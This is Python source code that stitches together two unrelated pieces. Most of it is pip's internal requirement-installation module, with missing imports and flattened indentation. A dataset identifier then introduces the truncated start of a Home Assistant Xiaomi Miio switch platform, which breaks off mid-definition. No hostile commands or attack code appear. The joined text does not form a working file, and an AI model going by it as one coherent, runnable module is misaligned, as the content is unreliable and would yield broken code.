from pip._vendor.packaging.markers import Marker
from pip._vendor.packaging.requirements import InvalidRequirement, Requirement
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.packaging.version import parse as parse_version
from pip._vendor.packaging.version import Version
from pip._vendor.pkg_resources import RequirementParseError, parse_requirements
from pip._internal import wheel
from pip._internal.build_env import BuildEnvironment
from pip._internal.compat import native_str
from pip._internal.download import (
is_archive_file, is_url, path_to_url, url_to_path,
)
from pip._internal.exceptions import InstallationError, UninstallationError
from pip._internal.locations import (
PIP_DELETE_MARKER_FILENAME, running_under_virtualenv,
)
from pip._internal.req.req_uninstall import UninstallPathSet
from pip._internal.utils.deprecation import RemovedInPip11Warning
from pip._internal.utils.hashes import Hashes
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
_make_build_dir, ask_path_exists, backup_dir, call_subprocess,
display_path, dist_in_site_packages, dist_in_usersite, ensure_dir,
get_installed_version, is_installable_dir, read_text_file, rmtree,
)
from pip._internal.utils.setuptools_build import SETUPTOOLS_SHIM
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.ui import open_spinner
from pip._internal.vcs import vcs
from pip._internal.wheel import Wheel, move_wheel_files
logger = logging.getLogger(__name__)
operators = specifiers.Specifier._operators.keys()
def _strip_extras(path):
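    """Split a requirement path into (path_without_extras, extras), where extras is the trailing '[...]' part or None."""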
m = re.match(r'^(.+)(\[[^\]]+\])$', path)
extras = None
if m:
path_no_extras = m.group(1)
extras = m.group(2)
else:
path_no_extras = path
return path_no_extras, extras
class InstallRequirement(object):
"""
Represents something that may be installed later on, may have information
    about where to fetch the relevant requirement and also contains logic for
installing the said requirement.
"""
def __init__(self, req, comes_from, source_dir=None, editable=False,
link=None, update=True, markers=None,
isolated=False, options=None, wheel_cache=None,
constraint=False, extras=()):
assert req is None or isinstance(req, Requirement), req
self.req = req
self.comes_from = comes_from
self.constraint = constraint
if source_dir is not None:
self.source_dir = os.path.normpath(os.path.abspath(source_dir))
else:
self.source_dir = None
self.editable = editable
self._wheel_cache = wheel_cache
if link is not None:
self.link = self.original_link = link
else:
from pip._internal.index import Link
self.link = self.original_link = req and req.url and Link(req.url)
if extras:
self.extras = extras
elif req:
self.extras = {
pkg_resources.safe_extra(extra) for extra in req.extras
}
else:
self.extras = set()
if markers is not None:
self.markers = markers
else:
self.markers = req and req.marker
self._egg_info_path = None
# This holds the pkg_resources.Distribution object if this requirement
# is already available:
self.satisfied_by = None
# This hold the pkg_resources.Distribution object if this requirement
# conflicts with another installed distribution:
self.conflicts_with = None
# Temporary build location
self._temp_build_dir = TempDirectory(kind="req-build")
# Used to store the global directory where the _temp_build_dir should
# have been created. Cf _correct_build_location method.
self._ideal_build_dir = None
# True if the editable should be updated:
self.update = update
# Set to True after successful installation
self.install_succeeded = None
# UninstallPathSet of uninstalled distribution (for possible rollback)
self.uninstalled_pathset = None
self.options = options if options else {}
# Set to True after successful preparation of this requirement
self.prepared = False
self.is_direct = False
self.isolated = isolated
self.build_env = BuildEnvironment(no_clean=True)
@classmethod
def from_editable(cls, editable_req, comes_from=None, isolated=False,
options=None, wheel_cache=None, constraint=False):
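        """Create an InstallRequirement from an editable requirement string, such as a local path or a VCS URL passed to 'pip install -e'."""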
from pip._internal.index import Link
name, url, extras_override = parse_editable(editable_req)
if url.startswith('file:'):
source_dir = url_to_path(url)
else:
source_dir = None
if name is not None:
try:
req = Requirement(name)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % name)
else:
req = None
return cls(
req, comes_from, source_dir=source_dir,
editable=True,
link=Link(url),
constraint=constraint,
isolated=isolated,
options=options if options else {},
wheel_cache=wheel_cache,
extras=extras_override or (),
)
@classmethod
def from_req(cls, req, comes_from=None, isolated=False, wheel_cache=None):
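        """Create an InstallRequirement from a requirement specifier pulled in as a dependency; direct URL requirements are rejected here."""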
try:
req = Requirement(req)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % req)
if req.url:
raise InstallationError(
"Direct url requirement (like %s) are not allowed for "
"dependencies" % req
)
return cls(req, comes_from, isolated=isolated, wheel_cache=wheel_cache)
@classmethod
def from_line(
cls, name, comes_from=None, isolated=False, options=None,
wheel_cache=None, constraint=False):
"""Creates an InstallRequirement from a name, which might be a
requirement, directory containing 'setup.py', filename, or URL.
"""
from pip._internal.index import Link
if is_url(name):
marker_sep = '; '
else:
marker_sep = ';'
if marker_sep in name:
name, markers = name.split(marker_sep, 1)
markers = markers.strip()
if not markers:
markers = None
else:
markers = Marker(markers)
else:
markers = None
name = name.strip()
req = None
path = os.path.normpath(os.path.abspath(name))
link = None
extras = None
if is_url(name):
link = Link(name)
else:
p, extras = _strip_extras(path)
looks_like_dir = os.path.isdir(p) and (
os.path.sep in name or
(os.path.altsep is not None and os.path.altsep in name) or
name.startswith('.')
)
if looks_like_dir:
if not is_installable_dir(p):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' "
"not found." % name
)
link = Link(path_to_url(p))
elif is_archive_file(p):
if not os.path.isfile(p):
logger.warning(
'Requirement %r looks like a filename, but the '
'file does not exist',
name
)
link = Link(path_to_url(p))
# it's a local file, dir, or url
if link:
# Handle relative file URLs
if link.scheme == 'file' and re.search(r'\.\./', link.url):
link = Link(
path_to_url(os.path.normpath(os.path.abspath(link.path))))
# wheel file
if link.is_wheel:
wheel = Wheel(link.filename) # can raise InvalidWheelFilename
req = "%s==%s" % (wheel.name, wheel.version)
else:
# set the req to the egg fragment. when it's not there, this
# will become an 'unnamed' requirement
req = link.egg_fragment
# a requirement specifier
else:
req = name
if extras:
extras = Requirement("placeholder" + extras.lower()).extras
else:
extras = ()
if req is not None:
try:
req = Requirement(req)
except InvalidRequirement:
if os.path.sep in req:
add_msg = "It looks like a path."
add_msg += deduce_helpful_msg(req)
elif '=' in req and not any(op in req for op in operators):
add_msg = "= is not a valid operator. Did you mean == ?"
else:
add_msg = traceback.format_exc()
raise InstallationError(
"Invalid requirement: '%s'\n%s" % (req, add_msg))
return cls(
req, comes_from, link=link, markers=markers,
isolated=isolated,
options=options if options else {},
wheel_cache=wheel_cache,
constraint=constraint,
extras=extras,
)
def __str__(self):
if self.req:
s = str(self.req)
if self.link:
s += ' from %s' % self.link.url
else:
s = self.link.url if self.link else None
if self.satisfied_by is not None:
s += ' in %s' % display_path(self.satisfied_by.location)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += ' (from %s)' % comes_from
return s
def __repr__(self):
return '<%s object: %s editable=%r>' % (
self.__class__.__name__, str(self), self.editable)
def populate_link(self, finder, upgrade, require_hashes):
"""Ensure that if a link can be found for this, that it is found.
        Note that self.link may still be None - if upgrade is False and the
requirement is already installed.
If require_hashes is True, don't use the wheel cache, because cached
wheels, always built locally, have different hashes than the files
downloaded from the index server and thus throw false hash mismatches.
        Furthermore, cached wheels at present have nondeterministic contents due
to file modification times.
"""
if self.link is None:
self.link = finder.find_requirement(self, upgrade)
if self._wheel_cache is not None and not require_hashes:
old_link = self.link
self.link = self._wheel_cache.get(self.link, self.name)
if old_link != self.link:
logger.debug('Using cached wheel link: %s', self.link)
@property
def specifier(self):
return self.req.specifier
@property
def is_pinned(self):
"""Return whether I am pinned to an exact version.
For example, some-package==1.2 is pinned; some-package>1.2 is not.
"""
specifiers = self.specifier
return (len(specifiers) == 1 and
next(iter(specifiers)).operator in {'==', '==='})
def from_path(self):
if self.req is None:
return None
s = str(self.req)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += '->' + comes_from
return s
def build_location(self, build_dir):
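        """Return the directory this requirement should be built in, creating a temporary build directory when the package name is not yet known."""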
assert build_dir is not None
if self._temp_build_dir.path is not None:
return self._temp_build_dir.path
if self.req is None:
# for requirement via a path to a directory: the name of the
# package is not available yet so we create a temp directory
            # Once run_egg_info has run, we'll be able
# to fix it via _correct_build_location
# Some systems have /tmp as a symlink which confuses custom
# builds (such as numpy). Thus, we ensure that the real path
# is returned.
self._temp_build_dir.create()
self._ideal_build_dir = build_dir
return self._temp_build_dir.path
if self.editable:
name = self.name.lower()
else:
name = self.name
# FIXME: Is there a better place to create the build_dir? (hg and bzr
# need this)
if not os.path.exists(build_dir):
logger.debug('Creating directory %s', build_dir)
_make_build_dir(build_dir)
return os.path.join(build_dir, name)
def _correct_build_location(self):
"""Move self._temp_build_dir to self._ideal_build_dir/self.req.name
For some requirements (e.g. a path to a directory), the name of the
package is not available until we run egg_info, so the build_location
will return a temporary directory and store the _ideal_build_dir.
This is only called by self.egg_info_path to fix the temporary build
directory.
"""
if self.source_dir is not None:
return
assert self.req is not None
assert self._temp_build_dir.path
assert self._ideal_build_dir.path
old_location = self._temp_build_dir.path
self._temp_build_dir.path = None
new_location = self.build_location(self._ideal_build_dir)
if os.path.exists(new_location):
raise InstallationError(
'A package already exists in %s; please remove it to continue'
% display_path(new_location))
logger.debug(
'Moving package %s from %s to new location %s',
self, display_path(old_location), display_path(new_location),
)
shutil.move(old_location, new_location)
self._temp_build_dir.path = new_location
self._ideal_build_dir = None
self.source_dir = os.path.normpath(os.path.abspath(new_location))
self._egg_info_path = None
@property
def name(self):
if self.req is None:
return None
return native_str(pkg_resources.safe_name(self.req.name))
@property
def setup_py_dir(self):
return os.path.join(
self.source_dir,
self.link and self.link.subdirectory_fragment or '')
@property
def setup_py(self):
assert self.source_dir, "No source dir for %s" % self
cmd = [sys.executable, '-c', 'import setuptools']
output = call_subprocess(
cmd,
show_stdout=False,
command_desc='python -c "import setuptools"',
on_returncode='ignore',
)
if output:
if get_installed_version('setuptools') is None:
add_msg = "Please install setuptools."
else:
add_msg = output
# Setuptools is not available
raise InstallationError(
"Could not import setuptools which is required to "
"install from a source distribution.\n%s" % add_msg
)
setup_py = os.path.join(self.setup_py_dir, 'setup.py')
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(setup_py, six.text_type):
setup_py = setup_py.encode(sys.getfilesystemencoding())
return setup_py
@property
def pyproject_toml(self):
assert self.source_dir, "No source dir for %s" % self
pp_toml = os.path.join(self.setup_py_dir, 'pyproject.toml')
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(pp_toml, six.text_type):
pp_toml = pp_toml.encode(sys.getfilesystemencoding())
return pp_toml
def get_pep_518_info(self):
"""Get a list of the packages required to build the project, if any,
and a flag indicating whether pyproject.toml is present, indicating
that the build should be isolated.
Build requirements can be specified in a pyproject.toml, as described
in PEP 518. If this file exists but doesn't specify build
requirements, pip will default to installing setuptools and wheel.
"""
if os.path.isfile(self.pyproject_toml):
with open(self.pyproject_toml) as f:
pp_toml = pytoml.load(f)
build_sys = pp_toml.get('build-system', {})
return (build_sys.get('requires', ['setuptools', 'wheel']), True)
return (['setuptools', 'wheel'], False)
def run_egg_info(self):
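        """Run 'setup.py egg_info' for this requirement and, when the requirement was unnamed, fill in self.req from the generated metadata."""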
assert self.source_dir
if self.name:
logger.debug(
'Running setup.py (path:%s) egg_info for package %s',
self.setup_py, self.name,
)
else:
logger.debug(
'Running setup.py (path:%s) egg_info for package from %s',
self.setup_py, self.link,
)
with indent_log():
script = SETUPTOOLS_SHIM % self.setup_py
base_cmd = [sys.executable, '-c', script]
if self.isolated:
base_cmd += ["--no-user-cfg"]
egg_info_cmd = base_cmd + ['egg_info']
# We can't put the .egg-info files at the root, because then the
# source code will be mistaken for an installed egg, causing
# problems
if self.editable:
egg_base_option = []
else:
egg_info_dir = os.path.join(self.setup_py_dir, 'pip-egg-info')
ensure_dir(egg_info_dir)
egg_base_option = ['--egg-base', 'pip-egg-info']
call_subprocess(
egg_info_cmd + egg_base_option,
cwd=self.setup_py_dir,
show_stdout=False,
command_desc='python setup.py egg_info')
if not self.req:
if isinstance(parse_version(self.pkg_info()["Version"]), Version):
op = "=="
else:
op = "==="
self.req = Requirement(
"".join([
self.pkg_info()["Name"],
op,
self.pkg_info()["Version"],
])
)
self._correct_build_location()
else:
metadata_name = canonicalize_name(self.pkg_info()["Name"])
if canonicalize_name(self.req.name) != metadata_name:
logger.warning(
'Running setup.py (path:%s) egg_info for package %s '
'produced metadata for project name %s. Fix your '
'#egg=%s fragments.',
self.setup_py, self.name, metadata_name, self.name
)
self.req = Requirement(metadata_name)
def egg_info_data(self, filename):
if self.satisfied_by is not None:
if not self.satisfied_by.has_metadata(filename):
return None
return self.satisfied_by.get_metadata(filename)
assert self.source_dir
filename = self.egg_info_path(filename)
if not os.path.exists(filename):
return None
data = read_text_file(filename)
return data
def egg_info_path(self, filename):
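        """Return the path to *filename* inside this requirement's .egg-info directory, locating that directory on first use."""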
if self._egg_info_path is None:
if self.editable:
base = self.source_dir
else:
base = os.path.join(self.setup_py_dir, 'pip-egg-info')
filenames = os.listdir(base)
if self.editable:
filenames = []
for root, dirs, files in os.walk(base):
for dir in vcs.dirnames:
if dir in dirs:
dirs.remove(dir)
# Iterate over a copy of ``dirs``, since mutating
# a list while iterating over it can cause trouble.
# (See https://github.com/pypa/pip/pull/462.)
for dir in list(dirs):
# Don't search in anything that looks like a virtualenv
# environment
if (
os.path.lexists(
os.path.join(root, dir, 'bin', 'python')
) or
os.path.exists(
os.path.join(
root, dir, 'Scripts', 'Python.exe'
)
)):
dirs.remove(dir)
# Also don't search through tests
elif dir == 'test' or dir == 'tests':
dirs.remove(dir)
filenames.extend([os.path.join(root, dir)
for dir in dirs])
filenames = [f for f in filenames if f.endswith('.egg-info')]
if not filenames:
raise InstallationError(
'No files/directories in %s (from %s)' % (base, filename)
)
assert filenames, \
"No files/directories in %s (from %s)" % (base, filename)
# if we have more than one match, we pick the toplevel one. This
# can easily be the case if there is a dist folder which contains
# an extracted tarball for testing purposes.
if len(filenames) > 1:
filenames.sort(
key=lambda x: x.count(os.path.sep) +
(os.path.altsep and x.count(os.path.altsep) or 0)
)
self._egg_info_path = os.path.join(base, filenames[0])
return os.path.join(self._egg_info_path, filename)
def pkg_info(self):
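        """Parse the PKG-INFO metadata of this requirement and return it as an email Message object."""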
p = FeedParser()
data = self.egg_info_data('PKG-INFO')
if not data:
logger.warning(
'No PKG-INFO file found in %s',
display_path(self.egg_info_path('PKG-INFO')),
)
p.feed(data or '')
return p.close()
_requirements_section_re = re.compile(r'\[(.*?)\]')
@property
def installed_version(self):
return get_installed_version(self.name)
def assert_source_matches_version(self):
assert self.source_dir
version = self.pkg_info()['version']
if self.req.specifier and version not in self.req.specifier:
logger.warning(
'Requested %s, but installing version %s',
self,
version,
)
else:
logger.debug(
'Source in %s has version %s, which satisfies requirement %s',
display_path(self.source_dir),
version,
self,
)
def update_editable(self, obtain=True):
if not self.link:
logger.debug(
"Cannot update repository at %s; repository location is "
"unknown",
self.source_dir,
)
return
assert self.editable
assert self.source_dir
if self.link.scheme == 'file':
# Static paths don't get updated
return
assert '+' in self.link.url, "bad url: %r" % self.link.url
if not self.update:
return
vc_type, url = self.link.url.split('+', 1)
backend = vcs.get_backend(vc_type)
if backend:
vcs_backend = backend(self.link.url)
if obtain:
vcs_backend.obtain(self.source_dir)
else:
vcs_backend.export(self.source_dir)
else:
assert 0, (
'Unexpected version control type (in %s): %s'
% (self.link, vc_type))
def uninstall(self, auto_confirm=False, verbose=False,
use_user_site=False):
"""
Uninstall the distribution currently satisfying this requirement.
Prompts before removing or modifying files unless
``auto_confirm`` is True.
Refuses to delete or modify files outside of ``sys.prefix`` -
thus uninstallation within a virtual environment can only
modify that virtual environment, even if the virtualenv is
linked to global site-packages.
"""
if not self.check_if_exists(use_user_site):
logger.warning("Skipping %s as it is not installed.", self.name)
return
dist = self.satisfied_by or self.conflicts_with
uninstalled_pathset = UninstallPathSet.from_dist(dist)
uninstalled_pathset.remove(auto_confirm, verbose)
return uninstalled_pathset
def archive(self, build_dir):
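        """Create a zip archive of this requirement's source tree in *build_dir*, prompting when an archive with the same name already exists."""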
assert self.source_dir
create_archive = True
archive_name = '%s-%s.zip' % (self.name, self.pkg_info()["version"])
archive_path = os.path.join(build_dir, archive_name)
if os.path.exists(archive_path):
response = ask_path_exists(
'The file %s exists. (i)gnore, (w)ipe, (b)ackup, (a)bort ' %
display_path(archive_path), ('i', 'w', 'b', 'a'))
if response == 'i':
create_archive = False
elif response == 'w':
logger.warning('Deleting %s', display_path(archive_path))
os.remove(archive_path)
elif response == 'b':
dest_file = backup_dir(archive_path)
logger.warning(
'Backing up %s to %s',
display_path(archive_path),
display_path(dest_file),
)
shutil.move(archive_path, dest_file)
elif response == 'a':
sys.exit(-1)
if create_archive:
zip = zipfile.ZipFile(
archive_path, 'w', zipfile.ZIP_DEFLATED,
allowZip64=True
)
dir = os.path.normcase(os.path.abspath(self.setup_py_dir))
for dirpath, dirnames, filenames in os.walk(dir):
if 'pip-egg-info' in dirnames:
dirnames.remove('pip-egg-info')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
zipdir.external_attr = 0x1ED << 16 # 0o755
zip.writestr(zipdir, '')
for filename in filenames:
if filename == PIP_DELETE_MARKER_FILENAME:
continue
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, self.name + '/' + name)
zip.close()
logger.info('Saved %s', display_path(archive_path))
def _clean_zip_name(self, name, prefix):
assert name.startswith(prefix + os.path.sep), (
"name %r doesn't start with prefix %r" % (name, prefix)
)
name = name[len(prefix) + 1:]
name = name.replace(os.path.sep, '/')
return name
def match_markers(self, extras_requested=None):
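        """Return True if this requirement's environment markers evaluate to True for any of the requested extras, or unconditionally when there are no markers."""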
if not extras_requested:
# Provide an extra to safely evaluate the markers
# without matching any extra
extras_requested = ('',)
if self.markers is not None:
return any(
self.markers.evaluate({'extra': extra})
for extra in extras_requested)
else:
return True
def install(self, install_options, global_options=None, root=None,
home=None, prefix=None, warn_script_location=True,
use_user_site=False, pycompile=True):
global_options = global_options if global_options is not None else []
if self.editable:
self.install_editable(
install_options, global_options, prefix=prefix,
)
return
if self.is_wheel:
version = wheel.wheel_version(self.source_dir)
wheel.check_compatibility(version, self.name)
self.move_wheel_files(
self.source_dir, root=root, prefix=prefix, home=home,
warn_script_location=warn_script_location,
use_user_site=use_user_site, pycompile=pycompile,
)
self.install_succeeded = True
return
# Extend the list of global and install options passed on to
# the setup.py call with the ones from the requirements file.
# Options specified in requirements file override those
# specified on the command line, since the last option given
# to setup.py is the one that is used.
global_options = list(global_options) + \
self.options.get('global_options', [])
install_options = list(install_options) + \
self.options.get('install_options', [])
if self.isolated:
global_options = global_options + ["--no-user-cfg"]
with TempDirectory(kind="record") as temp_dir:
record_filename = os.path.join(temp_dir.path, 'install-record.txt')
install_args = self.get_install_args(
global_options, record_filename, root, prefix, pycompile,
)
msg = 'Running setup.py install for %s' % (self.name,)
with open_spinner(msg) as spinner:
with indent_log():
call_subprocess(
install_args + install_options,
cwd=self.setup_py_dir,
show_stdout=False,
spinner=spinner,
)
if not os.path.exists(record_filename):
logger.debug('Record file %s not found', record_filename)
return
self.install_succeeded = True
def prepend_root(path):
if root is None or not os.path.isabs(path):
return path
else:
return change_root(root, path)
with open(record_filename) as f:
for line in f:
directory = os.path.dirname(line)
if directory.endswith('.egg-info'):
egg_info_dir = prepend_root(directory)
break
else:
logger.warning(
'Could not find .egg-info directory in install record'
' for %s',
self,
)
# FIXME: put the record somewhere
# FIXME: should this be an error?
return
new_lines = []
with open(record_filename) as f:
for line in f:
filename = line.strip()
if os.path.isdir(filename):
filename += os.path.sep
new_lines.append(
os.path.relpath(prepend_root(filename), egg_info_dir)
)
new_lines.sort()
ensure_dir(egg_info_dir)
inst_files_path = os.path.join(egg_info_dir, 'installed-files.txt')
with open(inst_files_path, 'w') as f:
f.write('\n'.join(new_lines) + '\n')
def ensure_has_source_dir(self, parent_dir):
"""Ensure that a source_dir is set.
This will create a temporary build dir if the name of the requirement
isn't known yet.
:param parent_dir: The ideal pip parent_dir for the source_dir.
Generally src_dir for editables and build_dir for sdists.
:return: self.source_dir
"""
if self.source_dir is None:
self.source_dir = self.build_location(parent_dir)
return self.source_dir
def get_install_args(self, global_options, record_filename, root, prefix,
pycompile):
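        """Build the 'setup.py install' command line used for a non-wheel, non-editable install."""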
install_args = [sys.executable, "-u"]
install_args.append('-c')
install_args.append(SETUPTOOLS_SHIM % self.setup_py)
install_args += list(global_options) + \
['install', '--record', record_filename]
install_args += ['--single-version-externally-managed']
if root is not None:
install_args += ['--root', root]
if prefix is not None:
install_args += ['--prefix', prefix]
if pycompile:
install_args += ["--compile"]
else:
install_args += ["--no-compile"]
if running_under_virtualenv():
py_ver_str = 'python' + sysconfig.get_python_version()
install_args += ['--install-headers',
os.path.join(sys.prefix, 'include', 'site',
py_ver_str, self.name)]
return install_args
def remove_temporary_source(self):
"""Remove the source files from this requirement, if they are marked
for deletion"""
if self.source_dir and os.path.exists(
os.path.join(self.source_dir, PIP_DELETE_MARKER_FILENAME)):
logger.debug('Removing source in %s', self.source_dir)
rmtree(self.source_dir)
self.source_dir = None
self._temp_build_dir.cleanup()
self.build_env.cleanup()
def install_editable(self, install_options,
global_options=(), prefix=None):
logger.info('Running setup.py develop for %s', self.name)
if self.isolated:
global_options = list(global_options) + ["--no-user-cfg"]
if prefix:
prefix_param = ['--prefix={}'.format(prefix)]
install_options = list(install_options) + prefix_param
with indent_log():
# FIXME: should we do --install-headers here too?
with self.build_env:
call_subprocess(
[
sys.executable,
'-c',
SETUPTOOLS_SHIM % self.setup_py
] +
list(global_options) +
['develop', '--no-deps'] +
list(install_options),
cwd=self.setup_py_dir,
show_stdout=False,
)
self.install_succeeded = True
def check_if_exists(self, use_user_site):
"""Find an installed distribution that satisfies or conflicts
with this requirement, and set self.satisfied_by or
self.conflicts_with appropriately.
"""
if self.req is None:
return False
try:
# get_distribution() will resolve the entire list of requirements
# anyway, and we've already determined that we need the requirement
# in question, so strip the marker so that we don't try to
# evaluate it.
no_marker = Requirement(str(self.req))
no_marker.marker = None
self.satisfied_by = pkg_resources.get_distribution(str(no_marker))
if self.editable and self.satisfied_by:
self.conflicts_with = self.satisfied_by
# when installing editables, nothing pre-existing should ever
# satisfy
self.satisfied_by = None
return True
except pkg_resources.DistributionNotFound:
return False
except pkg_resources.VersionConflict:
existing_dist = pkg_resources.get_distribution(
self.req.name
)
if use_user_site:
if dist_in_usersite(existing_dist):
self.conflicts_with = existing_dist
elif (running_under_virtualenv() and
dist_in_site_packages(existing_dist)):
raise InstallationError(
"Will not install to the user site because it will "
"lack sys.path precedence to %s in %s" %
(existing_dist.project_name, existing_dist.location)
)
else:
self.conflicts_with = existing_dist
return True
@property
def is_wheel(self):
return self.link and self.link.is_wheel
def move_wheel_files(self, wheeldir, root=None, home=None, prefix=None,
warn_script_location=True, use_user_site=False,
pycompile=True):
move_wheel_files(
self.name, self.req, wheeldir,
user=use_user_site,
home=home,
root=root,
prefix=prefix,
pycompile=pycompile,
isolated=self.isolated,
warn_script_location=warn_script_location,
)
def get_dist(self):
"""Return a pkg_resources.Distribution built from self.egg_info_path"""
egg_info = self.egg_info_path('').rstrip(os.path.sep)
base_dir = os.path.dirname(egg_info)
metadata = pkg_resources.PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
return pkg_resources.Distribution(
os.path.dirname(egg_info),
project_name=dist_name,
metadata=metadata,
)
@property
def has_hash_options(self):
"""Return whether any known-good hashes are specified as options.
These activate --require-hashes mode; hashes specified as part of a
URL do not.
"""
return bool(self.options.get('hashes', {}))
def hashes(self, trust_internet=True):
"""Return a hash-comparer that considers my option- and URL-based
hashes to be known-good.
Hashes in URLs--ones embedded in the requirements file, not ones
downloaded from an index server--are almost peers with ones from
flags. They satisfy --require-hashes (whether it was implicitly or
explicitly activated) but do not activate it. md5 and sha224 are not
allowed in flags, which should nudge people toward good algos. We
always OR all hashes together, even ones from URLs.
:param trust_internet: Whether to trust URL-based (#md5=...) hashes
downloaded from the internet, as by populate_link()
"""
good_hashes = self.options.get('hashes', {}).copy()
link = self.link if trust_internet else self.original_link
if link and link.hash:
good_hashes.setdefault(link.hash_name, []).append(link.hash)
return Hashes(good_hashes)
def _strip_postfix(req):
"""
Strip req postfix ( -dev, 0.2, etc )
"""
# FIXME: use package_to_requirement?
match = re.search(r'^(.*?)(?:-dev|-\d.*)$', req)
if match:
# Strip off -dev, -0.2, etc.
warnings.warn(
"#egg cleanup for editable urls will be dropped in the future",
RemovedInPip11Warning,
)
req = match.group(1)
return req
def parse_editable(editable_req):
"""Parses an editable requirement into:
- a requirement name
        - a URL
- extras
- editable options
Accepted requirements:
svn+http://blahblah@rev#egg=Foobar[baz]&subdirectory=version_subdir
.[some_extra]
"""
from pip._internal.index import Link
url = editable_req
# If a file path is specified with extras, strip off the extras.
url_no_extras, extras = _strip_extras(url)
if os.path.isdir(url_no_extras):
if not os.path.exists(os.path.join(url_no_extras, 'setup.py')):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' not found." %
url_no_extras
)
# Treating it as code that has already been checked out
url_no_extras = path_to_url(url_no_extras)
if url_no_extras.lower().startswith('file:'):
package_name = Link(url_no_extras).egg_fragment
if extras:
return (
package_name,
url_no_extras,
Requirement("placeholder" + extras.lower()).extras,
)
else:
return package_name, url_no_extras, None
for version_control in vcs:
if url.lower().startswith('%s:' % version_control):
url = '%s+%s' % (version_control, url)
break
if '+' not in url:
raise InstallationError(
'%s should either be a path to a local project or a VCS url '
'beginning with svn+, git+, hg+, or bzr+' %
editable_req
)
vc_type = url.split('+', 1)[0].lower()
if not vcs.get_backend(vc_type):
error_message = 'For --editable=%s only ' % editable_req + \
', '.join([backend.name + '+URL' for backend in vcs.backends]) + \
' is currently supported'
raise InstallationError(error_message)
package_name = Link(url).egg_fragment
if not package_name:
raise InstallationError(
"Could not detect requirement name for '%s', please specify one "
"with #egg=your_package_name" % editable_req
)
return _strip_postfix(package_name), url, None
def deduce_helpful_msg(req):
"""Returns helpful msg in case requirements file does not exist,
or cannot be parsed.
:params req: Requirements file path
"""
msg = ""
if os.path.exists(req):
msg = " It does exist."
# Try to parse and check if it is a requirements file.
try:
with open(req, 'r') as fp:
# parse first line only
next(parse_requirements(fp.read()))
msg += " The argument you provided " + \
"(%s) appears to be a" % (req) + \
" requirements file. If that is the" + \
" case, use the '-r' flag to install" + \
" the packages specified within it."
except RequirementParseError:
logger.debug("Cannot parse '%s' as requirements \
file" % (req), exc_info=1)
else:
msg += " File '%s' does not exist." % (req)
return msg
|
the-stack_106_12949
|
"""Support for Xiaomi Smart WiFi Socket and Smart Power Strip."""
import asyncio
from functools import partial
import logging
from miio import AirConditioningCompanionV3, ChuangmiPlug, DeviceException, PowerStrip
from miio.powerstrip import PowerMode
import voluptuous as vol
from homeassistant.components.switch import PLATFORM_SCHEMA, SwitchEntity
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_MODE,
CONF_HOST,
CONF_NAME,
CONF_TOKEN,
)
import homeassistant.helpers.config_validation as cv
from .const import (
CONF_DEVICE,
CONF_FLOW_TYPE,
CONF_MODEL,
DOMAIN,
SERVICE_SET_POWER_MODE,
SERVICE_SET_POWER_PRICE,
SERVICE_SET_WIFI_LED_OFF,
SERVICE_SET_WIFI_LED_ON,
)
from .device import XiaomiMiioEntity
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "Xiaomi Miio Switch"
DATA_KEY = "switch.xiaomi_miio"
MODEL_POWER_STRIP_V2 = "zimi.powerstrip.v2"
MODEL_PLUG_V3 = "chuangmi.plug.v3"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(cv.string, vol.Length(min=32, max=32)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_MODEL): vol.In(
[
"chuangmi.plug.v1",
"qmi.powerstrip.v1",
"zimi.powerstrip.v2",
"chuangmi.plug.m1",
"chuangmi.plug.m3",
"chuangmi.plug.v2",
"chuangmi.plug.v3",
"chuangmi.plug.hmi205",
"chuangmi.plug.hmi206",
"chuangmi.plug.hmi208",
"lumi.acpartner.v3",
]
),
}
)
ATTR_POWER = "power"
ATTR_TEMPERATURE = "temperature"
ATTR_LOAD_POWER = "load_power"
ATTR_MODEL = "model"
ATTR_POWER_MODE = "power_mode"
ATTR_WIFI_LED = "wifi_led"
ATTR_POWER_PRICE = "power_price"
ATTR_PRICE = "price"
SUCCESS = ["ok"]
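# Optional per-model features; they are OR-ed together into the FEATURE_FLAGS_* bitmasks below.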
FEATURE_SET_POWER_MODE = 1
FEATURE_SET_WIFI_LED = 2
FEATURE_SET_POWER_PRICE = 4
FEATURE_FLAGS_GENERIC = 0
FEATURE_FLAGS_POWER_STRIP_V1 = (
FEATURE_SET_POWER_MODE | FEATURE_SET_WIFI_LED | FEATURE_SET_POWER_PRICE
)
FEATURE_FLAGS_POWER_STRIP_V2 = FEATURE_SET_WIFI_LED | FEATURE_SET_POWER_PRICE
FEATURE_FLAGS_PLUG_V3 = FEATURE_SET_WIFI_LED
SERVICE_SCHEMA = vol.Schema({vol.Optional(ATTR_ENTITY_ID): cv.entity_ids})
SERVICE_SCHEMA_POWER_MODE = SERVICE_SCHEMA.extend(
{vol.Required(ATTR_MODE): vol.All(vol.In(["green", "normal"]))}
)
SERVICE_SCHEMA_POWER_PRICE = SERVICE_SCHEMA.extend(
{vol.Required(ATTR_PRICE): cv.positive_float}
)
SERVICE_TO_METHOD = {
SERVICE_SET_WIFI_LED_ON: {"method": "async_set_wifi_led_on"},
SERVICE_SET_WIFI_LED_OFF: {"method": "async_set_wifi_led_off"},
